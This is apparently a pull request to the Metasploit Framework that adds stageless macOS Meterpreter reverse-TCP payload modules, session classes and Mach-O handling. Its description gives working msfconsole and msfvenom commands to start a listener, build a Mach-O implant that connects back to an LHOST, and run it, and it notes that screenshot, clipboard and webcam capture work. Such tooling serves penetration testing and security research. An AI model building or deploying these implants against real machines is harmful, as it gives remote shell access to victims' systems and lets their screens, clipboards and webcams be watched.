### PR TITLE
OSX meterpreter

### DIFF
--- a/lib/msf/base/sessions/meterpreter_x64_osx.rb
+++ b/lib/msf/base/sessions/meterpreter_x64_osx.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'osx'
+    self.base_arch = ARCH_X64
+  end
+end
+
+end
+end
+

--- a/lib/msf/base/sessions/meterpreter_x86_osx.rb
+++ b/lib/msf/base/sessions/meterpreter_x86_osx.rb
@@ -1,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'osx'
+    self.base_arch = ARCH_X86
+  end
+end
+
+end
+end
+

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender'
   # @return           [String]
   # @return           [NilClass]
   def self.to_executable(framework, arch, plat, code = '', opts = {})
-    if elf? code
+    if elf? code or macho? code
       return code
     end
 
@@ -2122,15 +2122,19 @@ require 'msf/core/exe/segment_appender'
         end
       end
     when 'macho', 'osx-app'
-      macho = case arch
-      when ARCH_X86,nil
-        to_osx_x86_macho(framework, code, exeopts)
-      when ARCH_X64
-        to_osx_x64_macho(framework, code, exeopts)
-      when ARCH_ARMLE
-        to_osx_arm_macho(framework, code, exeopts)
-      when ARCH_PPC
-        to_osx_ppc_macho(framework, code, exeopts)
+      if macho? code
+        macho = code
+      else
+        macho = case arch
+        when ARCH_X86,nil
+          to_osx_x86_macho(framework, code, exeopts)
+        when ARCH_X64
+          to_osx_x64_macho(framework, code, exeopts)
+        when ARCH_ARMLE
+          to_osx_arm_macho(framework, code, exeopts)
+        when ARCH_PPC
+          to_osx_ppc_macho(framework, code, exeopts)
+        end
       end
       fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
     when 'vba'
@@ -2256,6 +2260,10 @@ require 'msf/core/exe/segment_appender'
 
   def self.elf?(code)
     code[0..3] == "\x7FELF"
+  end
+
+  def self.macho?(code)
+    code[0..3] == "\xCF\xFA\xED\xFE"
   end
 
 end

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -2263,7 +2263,7 @@ require 'msf/core/exe/segment_appender'
   end
 
   def self.macho?(code)
-    code[0..3] == "\xCF\xFA\xED\xFE"
+    code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE" 
   end
 
 end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -257,7 +257,7 @@ class Console::CommandDispatcher::Stdapi::Sys
         print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
         cmd_execute("-f", path, "-c", "-H", "-i")
       end
-    when 'linux'
+    when 'linux', 'osx'
       # Don't expand_path() this because it's literal anyway
       path = "/bin/sh"
       cmd_execute("-f", path, "-c", "-i")

--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
@@ -1,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_osx'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'OSX Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>'
+        ],
+        'Platform'      => 'osx',
+        'Arch'          => ARCH_X64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_x64_OSX
+      )
+    )
+  end
+
+  def generate
+    opts = {scheme: 'tcp'}
+    MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec
+  end
+end

--- a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb
@@ -1,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x86_osx'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'OSX Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>'
+        ],
+        'Platform'      => 'osx',
+        'Arch'          => ARCH_X86,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_x86_OSX
+      )
+    )
+  end
+
+  def generate
+    opts = {scheme: 'tcp'}
+    MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec
+  end
+end


### PR DESCRIPTION
I thought I'd PR this up early even though it's not quite ready to land, feel free to close this. It was straightforward to build mettle on OSX on OSX itself (i.e, without cross compiling). Full credit to @acammack-r7 and @busterb 
We'll need to update the gem to include the x86_64-apple-darwin TARGET.
Until then if you cd to the mettle directory it will be picked up automatically.
1. Land https://github.com/rapid7/mettle/pull/80
2. `make TARGET=x86_64-apple-darwin`
3. Start a handler: `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
`
4. Generate a macho: `msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out`
5. Run it :)

- I should probably have used the `generate_mettle_payloads.rb` tool.
- This is only stageless. We could probably use this: https://github.com/CylanceVulnResearch/osx_runbin for staging if @parchedmind is happy
- screenshot, clipboard and webcam_snap should work :)